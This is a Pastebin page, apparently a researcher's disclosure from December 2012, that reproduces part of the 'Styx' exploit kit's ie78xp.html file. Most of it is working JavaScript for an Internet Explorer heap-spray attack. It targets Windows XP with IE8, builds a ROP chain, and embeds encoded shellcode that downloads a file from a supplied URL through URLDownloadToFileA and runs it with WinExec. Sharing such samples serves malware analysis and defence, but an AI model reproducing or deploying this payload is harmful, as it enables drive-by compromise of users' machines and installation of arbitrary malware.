API tools faq
paste
Kafeine

Styx Sploit Pack - piece of ie78xp.html

Kafeine
Dec 21st, 2012
400
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.88 KB | None | 0 0
raw download clone embed print report
  1. function Url_To_ShellUrl(a) {
  2. var c = "",
  3. b = "",
  4. d = "",
  5. a = a + String.fromCharCode(0);
  6. a.length % 2 && (a += String.fromCharCode(0));
  7. for (var e = 0; e < a.length; e++) b = a.charCodeAt(e).toString(16), d = a.charCodeAt(e + 1).toString(16), 2 > b.length && (b = "0" + b), 2 > d.length && (d = "0" + d), c += "%u" + d + b, e += 1;
  8. return c
  9. }
  10. function heapLib() {}
  11. heapLib.ie = function (a, c) {
  12. this.maxAlloc = a ? a : 65535;
  13. this.heapBase = c ? c : 1376256;
  14. for (this.paddingStr = "AAAA"; 2 * this.paddingStr.length + 6 < this.maxAlloc;) this.paddingStr += this.paddingStr;
  15. this.mem = [];
  16. this.flushOleaut32()
  17. };
  18. heapLib.ie.prototype.debug = function (a) {
  19. void Math.atan2(47806, a)
  20. };
  21. heapLib.ie.prototype.debugHeap = function (a) {
  22. !0 == a ? void Math.atan(47806) : void Math.asin(47806)
  23. };
  24. heapLib.ie.prototype.debugBreak = function () {
  25. void Math.acos(47806)
  26. };
  27. heapLib.ie.prototype.padding = function (a) {
  28. if (a > this.paddingStr.length) throw "Requested padding string length " + a + ", only " + this.paddingStr.length + " available";
  29. return this.paddingStr.substr(0, a)
  30. };
  31. heapLib.ie.prototype.round = function (a, c) {
  32. if (0 == c) throw "Round argument cannot be 0";
  33. return parseInt((a + (c - 1)) / c) * c
  34. };
  35. heapLib.ie.prototype.hex = function (a, c) {
  36. for (var b = "0123456789ABCDEF".substr(a & 15, 1); 15 < a;) a >>>= 4, b = "0123456789ABCDEF".substr(a & 15, 1) + b;
  37. for (c = c ? c : 0; b.length < c;) b = "0" + b;
  38. return b
  39. };
  40. heapLib.ie.prototype.addr = function (a) {
  41. return unescape("%u" + this.hex(a & 65535, 4) + "%u" + this.hex(a >> 16 & 65535, 4))
  42. };
  43. heapLib.ie.prototype.allocOleaut32 = function (a, c) {
  44. var b;
  45. b = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a;
  46. if (0 != (b & 15)) throw "Allocation size " + b + " must be a multiple of 16";
  47. void 0 === this.mem[c] && (this.mem[c] = []);
  48. "string" == typeof a || a instanceof String ? this.mem[c].push(a.substr(0, a.length)) : this.mem[c].push(this.padding((a - 6) / 2))
  49. };
  50. heapLib.ie.prototype.freeOleaut32 = function (a) {
  51. delete this.mem[a];
  52. CollectGarbage()
  53. };
  54. heapLib.ie.prototype.flushOleaut32 = function () {
  55. this.debug("Flushing the OLEAUT32 cache");
  56. this.freeOleaut32("oleaut32");
  57. for (var a = 0; 6 > a; a++) this.allocOleaut32(32, "oleaut32"), this.allocOleaut32(64, "oleaut32"), this.allocOleaut32(256, "oleaut32"), this.allocOleaut32(32768, "oleaut32")
  58. };
  59. heapLib.ie.prototype.alloc = function (a, c) {
  60. var b;
  61. b = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a;
  62. if (32 == b || 64 == b || 256 == b || 32768 == b) throw "Allocation sizes " + b + " cannot be flushed out of the OLEAUT32 cache";
  63. this.allocOleaut32(a, c)
  64. };
  65. heapLib.ie.prototype.free = function (a) {
  66. this.freeOleaut32(a);
  67. this.flushOleaut32()
  68. };
  69. heapLib.ie.prototype.gc = function () {
  70. this.debug("Running the garbage collector");
  71. CollectGarbage();
  72. this.flushOleaut32()
  73. };
  74. heapLib.ie.prototype.freeList = function (a, c) {
  75. for (var c = c ? c : 1, b = 0; b < c; b++) this.alloc(a), this.alloc(a, "freeList");
  76. this.alloc(a);
  77. this.free("freeList")
  78. };
  79. heapLib.ie.prototype.lookaside = function (a, c) {
  80. var b;
  81. b = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a;
  82. if (0 != (b & 15)) throw "Allocation size " + b + " must be a multiple of 16";
  83. if (1024 <= b + 8) throw "Maximum lookaside block size is 1008 bytes";
  84. c = c ? c : 1;
  85. for (b = 0; b < c; b++) this.alloc(a, "lookaside");
  86. this.free("lookaside")
  87. };
  88. heapLib.ie.prototype.lookasideAddr = function (a) {
  89. a = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a;
  90. if (0 != (a & 15)) throw "Allocation size " + a + " must be a multiple of 16";
  91. if (1024 <= a + 8) throw "Maximum lookaside block size is 1008 bytes";
  92. return this.heapBase + 1672 + 48 * ((a + 8) / 8)
  93. };
  94. heapLib.ie.prototype.vtable = function (a, c, b) {
  95. b = b ? b : 1008;
  96. if (0 != (b & 15)) throw "Vtable size " + b + " must be a multiple of 16";
  97. if (2 * a.length > b - 138) throw "Maximum shellcode length is " + (b - 138) + " bytes";
  98. for (var d = unescape("%u9090%u7ceb"), e = 0; 31 > e; e++) d += this.addr(c);
  99. return d += unescape("%u0028%u0028") + a + heap.padding((b - 138) / 2 - a.length)
  100. };
  101. var pre_shell = "";
  102. var off_sub_int = 1530;
  103. var userAgent_var = navigator.userAgent.toLowerCase();
  104. if ((userAgent_var.indexOf("windows nt 5.1") >= 0) && (userAgent_var.indexOf('msie 8') >= 0)) {
  105. pre_shell = "%ue393%u77c4%ue392%u77c4%u5ed5%u77c1%u1891%u77c2%u0c04%u0c0c%ue392%u77c4%u1120%u77c1%ue493%u77c2%u7252%u5954%udd6c%u77c2%uec00%u77c4%u5459%u77c3%u7705%u77c4%u0114%u0000%uea01%u77c3%ud000%u77c5%u6100%u77c4%u6101%u77c4%ud680%u77c4%u0040%u0000%ue392%u77c4%u3c37%ud602%u2df9%u77c1";
  106. off_sub_int = 1524;
  107. }
  108. uzuz = uzuzs;
  109. for (var heap_obj = new heapLib.ie(131072), code = unescape(pre_shell + "%uc481%uf254%uffff%u00E8%u0000%u5D00%uED83%u3105%u64C9%u718B%u8B30%u0C76%u768B%u8B1C%u0846%u7E8B%u8B20%u6636%u4F39%u7518%uBEF2%u00D2%u0000%uEE01%uBEBF%u0000%u0100%uE8EF%u0163%u0000%uEA89%uC281%u00D2%u0000%u6852%u0080%u0000%u95FF%u00BE%u0000%uEA89%uC281%u00D2%u0000%uF631%uC201%u9C8A%uE335%u0001%u8000%u00FB%u0674%u1C88%u4632%uEEEB%u04C6%u0032%uEA89%uC281%u01C5%u0000%uFF52%uC295%u0000%u8900%u81EA%uD0C2%u0001%u5200%uFF50%uC695%u0000%u6A00%u6A00%u8900%u81EA%uD2C2%u0000%u5200%uEA89%uC281%u01F2%u0000%u6A52%uFF00%u6AD0%u8905%u81EA%uD2C2%u0000%u5200%u95FF%u00CA%u0000%u006A%u95FF%u00CE%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6D65%u5070%u7461%u4168%u4C00%u616F%u4C64%u6269%u6172%u7972%u0041%u6547%u5074%u6F72%u4163%u6464%u6572%u7373%u5700%u6E69%u7845%u6365%u4500%u6978%u5074%u6F72%u6563%u7373%uBB00%uF289%uF789%uC030%u75AE%u29FD%u89F7%u31F9%uBEC0%u003C%u0000%uB503%u019B%u0000%uAD66%u8503%u019B%u0000%u708B%u8378%u1CC6%uB503%u019B%u0000%uBD8D%u019F%u0000%u03AD%u9B85%u0001%uAB00%u03AD%u9B85%u0001%u5000%uADAB%u8503%u019B%u0000%u5EAB%uDB31%u56AD%u8503%u019B%u0000%uC689%uD789%uFC51%uA6F3%u7459%u5E04%uEB43%u5EE9%uD193%u03E0%uA785%u0001%u3100%u96F6%uAD66%uE0C1%u0302%u9F85%u0001%u8900%uADC6%u8503%u019B%u0000%uEBC3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u9B85%u0001%u5600%uE857%uFF58%uFFFF%u5E5F%u01AB%u80CE%uBB3E%u0274%uEDEB%u55C3%u4C52%u4F4D%u2E4E%u4C44%u004C%u5255%u444C%u776F%u6C6E%u616F%u5464%u466F%u6C69%u4165%u5700%u6E69%u7250%u636F%u7365%u2E73%u7865%u0065" + Url_To_ShellUrl(exec_file_url)), nops = unescape(uzuz); 524288 > nops.length;) nops += nops;
  110. for (var offset = nops.substring(0, off_sub_int), shellcode = offset + code + nops.substring(0, 2048 - code.length - offset.length); 262144 > shellcode.length;) shellcode += shellcode;
  111. var block = shellcode.substring(0, 262141);
  112. heap_obj.gc();
  113. for (var i = 1; 768 > i; i++) heap_obj.alloc(block);
  114. var overflow = nops.substring(0, 10);
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!